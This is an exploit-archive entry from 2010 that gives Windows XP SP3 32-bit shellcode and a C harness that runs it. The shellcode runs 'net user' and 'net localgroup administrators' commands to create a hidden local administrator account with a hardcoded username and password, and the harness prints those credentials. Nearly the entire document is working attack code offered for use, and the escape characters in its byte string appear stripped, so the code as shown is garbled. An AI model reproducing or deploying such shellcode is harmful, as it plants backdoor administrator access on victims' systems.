[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Published : 2010-10-04
# Author :
# Previous Title : BSD x86 portbind + fork shellcode (111 bytes)
# Next Title : BSD x86 connect back Shellcode (81 bytes)
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "xebx16x5bx31xc0x50x53xbbxadx23"
"x86x7cxffxd3x31xc0x50xbbxfaxca"
"x81x7cxffxd3xe8xe5xffxffxffx63"
"x6dx64x2ex65x78x65x20x2fx63x20"
"x6ex65x74x20x75x73x65x72x20x73"
"x65x63x75x69x64x30x20x6dx30x6e"
"x6bx20x2fx61x64x64x20x26x26x20"
"x6ex65x74x20x6cx6fx63x61x6cx67"
"x72x6fx75x70x20x61x64x6dx69x6e"
"x69x73x74x72x61x74x6fx72x73x20"
"x73x65x63x75x69x64x30x20x2fx61"
"x64x64x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin tUsername: secuid0ntttPassword: m0nk");
return 0;
}